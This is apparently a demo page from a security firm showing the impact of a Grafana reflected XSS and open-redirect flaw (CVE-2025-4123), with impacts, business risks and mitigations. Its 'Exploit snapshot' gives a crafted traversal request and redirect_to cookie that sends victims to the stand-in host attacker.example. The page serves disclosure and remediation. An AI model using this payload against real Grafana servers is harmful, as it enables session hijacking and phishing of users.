Grafana Reflected XSS → Impact Demonstration

You have been redirected here as part of the demo. This page does not perform a further redirect, but it represents what an attacker could show instead. The attacker could serve malicious JavaScript, phishing content, or inject a fake Grafana plugin to hijack user sessions.

What this proves

  • Forced navigation to attacker-controlled content.
  • JavaScript execution possible in the victim’s browser context.
  • Session hijack / account takeover via stolen cookies or API misuse.
  • Phishing / social engineering possible with look-alike Grafana UIs.
  • Optional SSRF if Image Renderer plugin is enabled.

Why this must be fixed

Business impact:
  • Unauthorized access to dashboards and sensitive data.
  • Privilege escalation and tampering with alerts/configuration.
  • Regulatory and reputational damage from compromised accounts.

Fix / Mitigation

  • Upgrade Grafana to a patched version (12.0.0+security-01, 11.6.1+security-01, etc.).
  • Apply strict Content Security Policy rules as per vendor guidance.
  • Monitor for suspicious redirect patterns and cookie abuse.

Exploit snapshot

GET /public/..%2F%5cattacker.example%2F%3f%2F..%2F..
Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cattacker...
→ HTTP/1.1 302 Found
Location: /\attacker.example/?/../../

Source: watchTowr validation; behavior matches CVE-2025-4123 reflected XSS redirect vector.

Demo by Circles Cyber Defence. This page shows what an attacker could deliver after exploiting the redirect.